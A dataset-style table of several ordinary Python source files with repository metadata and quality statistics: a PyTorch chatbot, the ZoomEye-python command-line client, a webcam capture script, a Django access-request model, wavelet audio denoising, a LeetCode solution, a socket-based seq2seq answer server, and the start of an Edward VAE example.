hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
cdeaa27ba25e454daf95595f163fae1a13887999
| 1,220
|
py
|
Python
|
chat.py
|
Programmer-RD-AI/Learning-NLP-PyTorch
|
5780598340308995c0b8436d3031aa58ee7b81da
|
[
"Apache-2.0"
] | null | null | null |
chat.py
|
Programmer-RD-AI/Learning-NLP-PyTorch
|
5780598340308995c0b8436d3031aa58ee7b81da
|
[
"Apache-2.0"
] | null | null | null |
chat.py
|
Programmer-RD-AI/Learning-NLP-PyTorch
|
5780598340308995c0b8436d3031aa58ee7b81da
|
[
"Apache-2.0"
] | null | null | null |
import random
import json
import torch
from model import NeuralNet
from nltk_utils import *
device = "cuda"
with open('intents.json','r') as f:
intents = json.load(f)
FILE = 'data.pth'
data = torch.load(FILE)
input_size = data['input_size']
output_size = data['output_size']
hidden_size = data['hidden_size']
all_words = data['all_words']
tags = data['tags']
model_state = data['model_state']
model = NeuralNet(input_size, hidden_size, output_size).to(device)
model.load_state_dict(model_state)
model.eval()
bot_name = 'Programmer-RD-AI'
print('Lets chat ! type "quit" to exit')
while True:
sentence = input('You : ')
if sentence == 'quit':
break
sentence = tokenize(sentence)
X = bag_of_words(sentence,all_words)
X = X.reshape(1,X.shape[0])
X = torch.from_numpy(X).to(device)
pred = model(X)
pred_ = pred.clone()
_,pred = torch.max(pred,dim=1)
tag = tags[pred.item()]
probs = torch.softmax(pred_,dim=1)
prob = probs[0][pred.item()]
if prob.item() > 0.75:
for intent in intents['intents']:
if tag == intent['tag']:
print(f'{bot_name}: {random.choice(intent["responses"])}')
else:
print(f'{bot_name}: IDK..')
| 29.047619
| 74
| 0.648361
| 180
| 1,220
| 4.244444
| 0.416667
| 0.03534
| 0.036649
| 0.034031
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.00813
| 0.193443
| 1,220
| 41
| 75
| 29.756098
| 0.768293
| 0
| 0
| 0
| 0
| 0
| 0.17459
| 0.029508
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.121951
| 0
| 0.121951
| 0.073171
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
cdecd7c4bafe572b5e961bd73c1a75878f9feaa8
| 3,428
|
py
|
Python
|
zoomeye/cli.py
|
r0oike/zoomeye-python
|
b93f1c9c350e4fce7580f9f71ab1e76d06ce165d
|
[
"Apache-2.0"
] | null | null | null |
zoomeye/cli.py
|
r0oike/zoomeye-python
|
b93f1c9c350e4fce7580f9f71ab1e76d06ce165d
|
[
"Apache-2.0"
] | null | null | null |
zoomeye/cli.py
|
r0oike/zoomeye-python
|
b93f1c9c350e4fce7580f9f71ab1e76d06ce165d
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
* Filename: cli.py
* Description: cli program entry
* Time: 2020.11.30
* Author: liuf5
*/
"""
import os
import sys
import argparse
module_path = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
sys.path.insert(1, module_path)
from zoomeye import core
class ZoomEyeParser(argparse.ArgumentParser):
def error(self, message):
self.print_help()
sys.exit(2)
def main():
"""
parse user input args
:return:
"""
parser = ZoomEyeParser()
subparsers = parser.add_subparsers()
# zoomeye account info
parser_info = subparsers.add_parser("info", help="Show ZoomEye account info")
parser_info.set_defaults(func=core.info)
# query zoomeye data
parser_search = subparsers.add_parser(
"search",
help="Search the ZoomEye database"
)
parser_search.add_argument(
"dork",
help="The ZoomEye search keyword or ZoomEye exported file"
)
parser_search.add_argument(
"-num",
default=20,
help="The number of search results that should be returned",
type=int,
metavar='value'
)
parser_search.add_argument(
"-facet",
default=None,
nargs='?',
const='app,device,service,os,port,country,city',
type=str,
help=('''
Perform statistics on ZoomEye database,
field: [app,device,service,os,port,country,city]
'''),
metavar='field'
)
parser_search.add_argument(
"-filter",
default=None,
metavar='field=regexp',
nargs='?',
const='app',
type=str,
help=('''
Output more clearer search results by set filter field,
field: [app,version,device,port,city,country,asn,banner,*]
''')
)
parser_search.add_argument(
'-stat',
default=None,
metavar='field',
nargs='?',
const='app,device,service,os,port,country,city',
type=str,
help=('''
Perform statistics on search results,
field: [app,device,service,os,port,country,city]
''')
)
parser_search.add_argument(
"-save",
default=None,
metavar='field=regexp',
help=('''
Save the search results with ZoomEye json format,
if you specify the field, it will be saved with JSON Lines
'''),
nargs='?',
type=str,
const='all'
)
parser_search.add_argument(
"-count",
help="The total number of results in ZoomEye database for a search",
action="store_true"
)
parser_search.set_defaults(func=core.search)
# initial account configuration related commands
parser_init = subparsers.add_parser("init", help="Initialize the token for ZoomEye-python")
parser_init.add_argument("-apikey", help="ZoomEye API Key", default=None, metavar='[api key]')
parser_init.add_argument("-username", help="ZoomEye account username", default=None, metavar='[username]')
parser_init.add_argument("-password", help="ZoomEye account password", default=None, metavar='[password]')
parser_init.set_defaults(func=core.init)
args = parser.parse_args()
try:
args.func(args)
except AttributeError:
parser.print_help()
if __name__ == '__main__':
main()
| 26.369231
| 110
| 0.606768
| 392
| 3,428
| 5.17602
| 0.369898
| 0.059142
| 0.05175
| 0.079349
| 0.18137
| 0.109414
| 0.109414
| 0.109414
| 0.071957
| 0.071957
| 0
| 0.005983
| 0.26867
| 3,428
| 129
| 111
| 26.573643
| 0.803351
| 0.073221
| 0
| 0.34375
| 0
| 0
| 0.353147
| 0.067069
| 0
| 0
| 0
| 0
| 0
| 1
| 0.020833
| false
| 0.010417
| 0.041667
| 0
| 0.072917
| 0.020833
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
cdeceab8b898ec021afc4aa90ddeda2bd76d683c
| 862
|
py
|
Python
|
3) Cartoonizing and Video Capture/#1 Accessing the webcam/webcam_access.py
|
RezaFirouzii/python-opencv-review
|
454a2be7fa36516a2b1fbd4e6162068bba25c989
|
[
"MIT"
] | null | null | null |
3) Cartoonizing and Video Capture/#1 Accessing the webcam/webcam_access.py
|
RezaFirouzii/python-opencv-review
|
454a2be7fa36516a2b1fbd4e6162068bba25c989
|
[
"MIT"
] | null | null | null |
3) Cartoonizing and Video Capture/#1 Accessing the webcam/webcam_access.py
|
RezaFirouzii/python-opencv-review
|
454a2be7fa36516a2b1fbd4e6162068bba25c989
|
[
"MIT"
] | null | null | null |
import cv2 as cv
if __name__ == "__main__":
# 0 => first (default) webcam connected,
# 1 => second webcam and so on.
cap = cv.VideoCapture(0, cv.CAP_DSHOW)
# cv.namedWindow("Window")
if not cap.isOpened():
raise IOError("Webcam could not be opened!")
while True:
res, frame = cap.read() # returns (bool, ndarray)
# in case any error occurs
if not res:
break
frame = cv.resize(frame, None, fx=.5, fy=.5)
cv.imshow("Video Stream", frame)
keyboardInput = cv.waitKey(1)
if keyboardInput == 27: # ESC button ascii code
break
cap.release()
cv.destroyAllWindows()
# you can also replace a normal video with webcam
# in video capture object, just give it the address of
# the video instead of 0 or number of your webcam
| 25.352941
| 61
| 0.597448
| 116
| 862
| 4.362069
| 0.681034
| 0.019763
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.016722
| 0.306265
| 862
| 33
| 62
| 26.121212
| 0.829431
| 0.363109
| 0
| 0.125
| 0
| 0
| 0.087199
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.0625
| 0
| 0.0625
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
cdf16ad97ffce90e11c1fa4d69eb40752cd40a16
| 3,928
|
py
|
Python
|
apps/sso/access_requests/models.py
|
g10f/sso
|
ba6eb712add388c69d4880f5620a2e4ce42d3fee
|
[
"BSD-3-Clause"
] | 3
|
2021-05-16T17:06:57.000Z
|
2021-05-28T17:14:05.000Z
|
apps/sso/access_requests/models.py
|
g10f/sso
|
ba6eb712add388c69d4880f5620a2e4ce42d3fee
|
[
"BSD-3-Clause"
] | null | null | null |
apps/sso/access_requests/models.py
|
g10f/sso
|
ba6eb712add388c69d4880f5620a2e4ce42d3fee
|
[
"BSD-3-Clause"
] | null | null | null |
import datetime
from current_user.models import CurrentUserField
from django.conf import settings
from django.db import models
from django.urls import reverse
from django.utils.timezone import now
from django.utils.translation import gettext_lazy as _
from sso.accounts.models import Application
from sso.models import AbstractBaseModel, AbstractBaseModelManager
from sso.organisations.models import is_validation_period_active, Organisation
class AccessRequestManager(AbstractBaseModelManager):
def open(self):
return self.get(status='o')
class OpenAccessRequestManager(AbstractBaseModelManager):
def get_queryset(self):
return super().get_queryset().filter(status='o').prefetch_related('user__useremail_set')
class AccessRequest(AbstractBaseModel):
STATUS_CHOICES = [
('o', _('open')), # opened by user
('c', _('canceled')), # by user
('v', _('approved')),
('d', _('denied'))
]
user = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE)
message = models.TextField(_("message"), max_length=2048,
help_text=_('Message for the administrators.'),
blank=True)
comment = models.TextField(_("Comment"), max_length=2048, blank=True)
status = models.CharField(_('status'), max_length=255, choices=STATUS_CHOICES, default='o')
last_modified_by_user = CurrentUserField(verbose_name=_('last modified by'),
related_name='accessrequest_last_modified_by',
on_delete=models.SET_NULL)
completed_by_user = models.ForeignKey(settings.AUTH_USER_MODEL, blank=True, null=True,
verbose_name=_('completed by'),
related_name='accessrequest_completed_by', on_delete=models.SET_NULL)
application = models.ForeignKey(Application, blank=True, null=True, on_delete=models.SET_NULL,
verbose_name=_('application'))
# required field if the user has no organisation
organisation = models.ForeignKey(Organisation, blank=True, null=True, on_delete=models.CASCADE)
objects = AccessRequestManager()
open = OpenAccessRequestManager()
def process(self, action=None, user=None):
if action in ['cancel', 'verify', 'deny']:
getattr(self, action)(user)
else:
raise ValueError
def cancel(self, user):
self.status = 'c'
self.completed_by_user = user
self.save()
def verify(self, user):
self.status = 'v'
self.completed_by_user = user
if self.organisation:
self.user.set_organisations([self.organisation])
# check if organisation uses user activation
validation_period_active = False
for organisation in self.user.organisations.all():
if is_validation_period_active(organisation):
self.user.valid_until = now() + datetime.timedelta(days=settings.SSO_VALIDATION_PERIOD_DAYS)
self.user.save()
validation_period_active = True
if not validation_period_active:
self.user.valid_until = None
self.user.save()
# add default member profile
self.user.role_profiles.add(user.get_default_role_profile())
self.user.role_profiles.remove(user.get_default_guest_profile())
self.save()
def deny(self, user):
self.status = 'd'
self.completed_by_user = user
self.save()
@property
def is_open(self):
return self.status == 'o'
class Meta(AbstractBaseModel.Meta):
verbose_name = _('access request')
verbose_name_plural = _('access request')
def get_absolute_url(self):
return reverse('accounts:accessrequest_detail', kwargs={'pk': self.pk})
| 39.28
| 111
| 0.649949
| 429
| 3,928
| 5.731935
| 0.305361
| 0.035787
| 0.044734
| 0.02074
| 0.165921
| 0.102481
| 0.083774
| 0
| 0
| 0
| 0
| 0.003743
| 0.251782
| 3,928
| 99
| 112
| 39.676768
| 0.832936
| 0.035387
| 0
| 0.102564
| 0
| 0
| 0.073222
| 0.022469
| 0
| 0
| 0
| 0
| 0
| 1
| 0.102564
| false
| 0
| 0.128205
| 0.051282
| 0.474359
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
cdf35f3aa036ddd5079307083d76c1f9e474653b
| 1,518
|
py
|
Python
|
test/snr_test.py
|
AP-Atul/wavelets
|
cff71e777759844b35f8e96f14930b2c71a215a1
|
[
"MIT"
] | 5
|
2021-02-01T07:43:39.000Z
|
2022-03-25T05:01:31.000Z
|
test/snr_test.py
|
AP-Atul/wavelets
|
cff71e777759844b35f8e96f14930b2c71a215a1
|
[
"MIT"
] | null | null | null |
test/snr_test.py
|
AP-Atul/wavelets
|
cff71e777759844b35f8e96f14930b2c71a215a1
|
[
"MIT"
] | null | null | null |
import os
from time import time
import numpy as np
import soundfile
from matplotlib import pyplot as plt
from wavelet.fast_transform import FastWaveletTransform
from wavelet.util.utility import threshold, mad, snr, amp_to_db
INPUT_FILE = "/example/input/file.wav"
OUTPUT_DIR = "/example/output/"
info = soundfile.info(INPUT_FILE) # getting info of the audio
rate = info.samplerate
WAVELET_NAME = "coif1"
t = FastWaveletTransform(WAVELET_NAME)
outputFileName = os.path.join(OUTPUT_DIR, "_" + WAVELET_NAME + ".wav")
noiseRatios = list()
with soundfile.SoundFile(outputFileName, "w", samplerate=rate, channels=info.channels) as of:
start = time()
for block in soundfile.blocks(INPUT_FILE, int(rate * info.duration * 0.10)): # reading 10 % of duration
coefficients = t.waveDec(block)
# VISU Shrink
sigma = mad(coefficients)
thresh = sigma * np.sqrt(2 * np.log(len(block)))
# thresholding using the noise threshold generated
coefficients = threshold(coefficients, thresh)
# getting the clean signal as in original form and writing to the file
clean = t.waveRec(coefficients)
clean = np.asarray(clean)
of.write(clean)
noiseRatios.append(snr(amp_to_db(clean)))
end = time()
x = []
for i in range(len(noiseRatios)):
x.append(i)
plt.plot(x, np.array(noiseRatios).astype(float))
plt.show()
print(f"Finished processing with {WAVELET_NAME}")
print(f"Time taken :: {end - start} s")
| 29.192308
| 108
| 0.689065
| 202
| 1,518
| 5.10396
| 0.475248
| 0.034918
| 0.015519
| 0.019399
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.0058
| 0.204875
| 1,518
| 51
| 109
| 29.764706
| 0.848384
| 0.118577
| 0
| 0
| 0
| 0
| 0.088589
| 0.017267
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.205882
| 0
| 0.205882
| 0.058824
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
cdf93d47f329e66522fe3776469675377c2e7349
| 1,758
|
py
|
Python
|
leetcode/0566_reshape_the_matrix.py
|
chaosWsF/Python-Practice
|
ff617675b6bcd125933024bb4c246b63a272314d
|
[
"BSD-2-Clause"
] | null | null | null |
leetcode/0566_reshape_the_matrix.py
|
chaosWsF/Python-Practice
|
ff617675b6bcd125933024bb4c246b63a272314d
|
[
"BSD-2-Clause"
] | null | null | null |
leetcode/0566_reshape_the_matrix.py
|
chaosWsF/Python-Practice
|
ff617675b6bcd125933024bb4c246b63a272314d
|
[
"BSD-2-Clause"
] | null | null | null |
"""
In MATLAB, there is a very useful function called 'reshape', which can reshape a matrix into
a new one with different size but keep its original data. You're given a matrix represented
by a two-dimensional array, and two positive integers r and c representing the row number and
column number of the wanted reshaped matrix, respectively. The reshaped matrix need to be filled
with all the elements of the original matrix in the same row-traversing order as they were. If
the 'reshape' operation with given parameters is possible and legal, output the new reshaped
matrix; Otherwise, output the original matrix.
Example 1:
Input:
nums = [[1, 2], [3, 4]]
r = 1, c = 4
Output:
[[1, 2, 3, 4]]
Explanation:
The row-traversing of nums is [1, 2, 3, 4]. The new reshaped matrix is a 1 * 4 matrix, fill
it row by row by using the previous list.
Example 2:
Input:
nums = [[1, 2], [3, 4]]
r = 2, c = 4
Output:
[[1, 2], [3, 4]]
Explanation:
There is no way to reshape a 2 * 2 matrix to a 2 * 4 matrix. So output the original matrix.
Note:
1. The height and width of the given matrix is in range [1, 100].
2. The given r and c are all positive.
"""
class Solution:
def matrixReshape1(self, nums, r, c): # 96ms
elements = sum(nums, [])
n = len(elements)
if r * c != n:
return nums
else:
return [elements[i:i+c] for i in range(0, n, c)]
def matrixReshape2(self, nums, r, c): # 88ms
if len(nums[0]) * len(nums) != r * c:
return nums
else:
elements = sum(nums, [])
return [elements[i:i+c] for i in range(0, len(elements), c)]
| 33.807692
| 100
| 0.606371
| 280
| 1,758
| 3.807143
| 0.367857
| 0.009381
| 0.014071
| 0.018762
| 0.123827
| 0.123827
| 0.123827
| 0.097561
| 0.054409
| 0.054409
| 0
| 0.03818
| 0.299772
| 1,758
| 51
| 101
| 34.470588
| 0.827782
| 0.717861
| 0
| 0.428571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.142857
| false
| 0
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
cdfba4673ccb2b05e2ef7ddcaa8aeaa3095e7451
| 4,629
|
py
|
Python
|
python/main.py
|
LaraProject/rnn2java
|
f35b1b98f74864d4310e7866ad5271ae5389292d
|
[
"MIT"
] | null | null | null |
python/main.py
|
LaraProject/rnn2java
|
f35b1b98f74864d4310e7866ad5271ae5389292d
|
[
"MIT"
] | null | null | null |
python/main.py
|
LaraProject/rnn2java
|
f35b1b98f74864d4310e7866ad5271ae5389292d
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
import socket
import select
from time import sleep
import message_pb2
from google.protobuf.internal import encoder
import tensorflow as tf
from tensorflow.keras import preprocessing
import pickle
import numpy as np
## RNN part
# Load the inference model
def load_inference_models(enc_file, dec_file):
encoder_model = tf.keras.models.load_model(enc_file)
decoder_model = tf.keras.models.load_model(dec_file)
return (encoder_model, decoder_model)
# Load the tokenizer
def load_tokenizer(tokenizer_file):
with open(tokenizer_file, 'rb') as handle:
tokenizer = pickle.load(handle)
return tokenizer
def load_length(length_file):
with open(length_file, "r") as f:
data = ((f.read()).split(","))
return int(data[0]), int(data[1])
# Talking with our Chatbot
def str_to_tokens( sentence : str, tokenizer, maxlen_questions):
words = sentence.lower().split()
tokens_list = list()
for word in words:
if word in tokenizer.word_index:
tokens_list.append(tokenizer.word_index[word])
else:
tokens_list.append(tokenizer.word_index['<unk>'])
return preprocessing.sequence.pad_sequences([tokens_list],
maxlen=maxlen_questions, padding='post')
def answer(question, enc_model, dec_model, tokenizer, maxlen_questions, maxlen_answers):
states_values = enc_model.predict(str_to_tokens(question, tokenizer, maxlen_questions))
empty_target_seq = np.zeros((1, 1))
empty_target_seq[0, 0] = tokenizer.word_index['<start>']
stop_condition = False
decoded_translation = ''
while not stop_condition:
(dec_outputs, h, c) = dec_model.predict([empty_target_seq]
+ states_values)
sampled_word_index = np.argmax(dec_outputs[0, -1, :])
sampled_word = None
for (word, index) in tokenizer.word_index.items():
if sampled_word_index == index:
decoded_translation += ' {}'.format(word)
sampled_word = word
if sampled_word == '<end>' or len(decoded_translation.split()) > maxlen_answers:
stop_condition = True
empty_target_seq = np.zeros((1, 1))
empty_target_seq[0, 0] = sampled_word_index
states_values = [h, c]
return (decoded_translation[:-5]) # remove end w
### END RNN PART ###
PORT = 9987
def recvall(sock):
BUFF_SIZE = 4096 # 4 KiB
data = b''
while True:
part = sock.recv(BUFF_SIZE)
data += part
if len(part) < BUFF_SIZE:
# either 0 or end of data
break
return data
def answer_command(question, enc_model, dec_model, tokenizer, maxlen_questions, maxlen_answers):
command = message_pb2.Command()
command.type = message_pb2.Command.ANSWER
command.name = 'ANSWER to "' + question + '"'
command.data = answer(question, enc_model, dec_model, tokenizer, maxlen_questions, maxlen_answers)
return command
def main():
# Connect over TCP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(('localhost', PORT))
sock.listen(5)
# Current person
max_lengths = [[22,74]]
person = 1
enc_model, dec_model = load_inference_models("../models/" + str(person) + "/model_enc.h5", "../models/" + str(person) + "/model_dec.h5")
tokenizer = load_tokenizer("../models/" + str(person) + "/tokenizer.pickle")
maxlen_questions, maxlen_answers = load_length("../models/" + str(person) + "/length.txt")
cmd = message_pb2.Command()
over = False
while True and (not over):
conn, addr = sock.accept()
#conn.setblocking(0)
while True:
data = conn.recv(4096)
if not data: break
ready = select.select([conn], [], [], 1.0)
if ready[0]:
data += recvall(conn)
cmd.ParseFromString(data)
if (cmd.type == message_pb2.Command.CommandType.QUESTION):
print("Question : '" + cmd.data + "' received.")
conn.send(answer_command(cmd.data, enc_model, dec_model, tokenizer, maxlen_questions, maxlen_answers).SerializeToString())
print("Question answered.")
conn.close()
break
elif (cmd.type == message_pb2.Command.CommandType.ANSWER):
print("Error, only questions are accepted.")
over = True
conn.close()
break
elif (cmd.type == message_pb2.Command.CommandType.SWITCH_PERSON):
print("Switching to person" + cmd.data)
person = int(cmd.data)
enc_model, dec_model = load_inference_models("../models/" + str(person) + "/model_enc.h5", "../models/" + str(person) + "/model_dec.h5")
tokenizer = load_tokenizer("../models/" + str(person) + "/tokenizer.pickle")
maxlen_questions, maxlen_answers = load_length("../models/" + str(person) + "/length.txt")
conn.close()
break
elif (cmd.type == message_pb2.Command.CommandType.SHUTDOWN):
print("Quiting.")
over = True
conn.close()
break
sleep(1)
sock.close()
if __name__ == '__main__':
main()
| 32.598592
| 140
| 0.712249
| 636
| 4,629
| 4.97956
| 0.264151
| 0.022734
| 0.037891
| 0.030313
| 0.34228
| 0.332807
| 0.278813
| 0.278813
| 0.278813
| 0.262078
| 0
| 0.012977
| 0.151005
| 4,629
| 141
| 141
| 32.829787
| 0.792875
| 0.04623
| 0
| 0.181034
| 0
| 0
| 0.079145
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.068966
| false
| 0
| 0.077586
| 0
| 0.206897
| 0.043103
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
cdfcd2a90ed7ec6257eb01c41e93f4909519bbec
| 3,427
|
py
|
Python
|
examples/vae.py
|
zhangyewu/edward
|
8ec452eb0a3801df8bda984796034a9e945faec7
|
[
"Apache-2.0"
] | 5,200
|
2016-05-03T04:59:01.000Z
|
2022-03-31T03:32:26.000Z
|
examples/vae.py
|
zhangyewu/edward
|
8ec452eb0a3801df8bda984796034a9e945faec7
|
[
"Apache-2.0"
] | 724
|
2016-05-04T09:04:37.000Z
|
2022-02-28T02:41:12.000Z
|
examples/vae.py
|
zhangyewu/edward
|
8ec452eb0a3801df8bda984796034a9e945faec7
|
[
"Apache-2.0"
] | 1,004
|
2016-05-03T22:45:14.000Z
|
2022-03-25T00:08:08.000Z
|
"""Variational auto-encoder for MNIST data.
References
----------
http://edwardlib.org/tutorials/decoder
http://edwardlib.org/tutorials/inference-networks
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import edward as ed
import numpy as np
import os
import tensorflow as tf
from edward.models import Bernoulli, Normal
from edward.util import Progbar
from observations import mnist
from scipy.misc import imsave
tf.flags.DEFINE_string("data_dir", default="/tmp/data", help="")
tf.flags.DEFINE_string("out_dir", default="/tmp/out", help="")
tf.flags.DEFINE_integer("M", default=100, help="Batch size during training.")
tf.flags.DEFINE_integer("d", default=2, help="Latent dimension.")
tf.flags.DEFINE_integer("n_epoch", default=100, help="")
FLAGS = tf.flags.FLAGS
if not os.path.exists(FLAGS.out_dir):
os.makedirs(FLAGS.out_dir)
def generator(array, batch_size):
"""Generate batch with respect to array's first axis."""
start = 0 # pointer to where we are in iteration
while True:
stop = start + batch_size
diff = stop - array.shape[0]
if diff <= 0:
batch = array[start:stop]
start += batch_size
else:
batch = np.concatenate((array[start:], array[:diff]))
start = diff
batch = batch.astype(np.float32) / 255.0 # normalize pixel intensities
batch = np.random.binomial(1, batch) # binarize images
yield batch
def main(_):
ed.set_seed(42)
# DATA. MNIST batches are fed at training time.
(x_train, _), (x_test, _) = mnist(FLAGS.data_dir)
x_train_generator = generator(x_train, FLAGS.M)
# MODEL
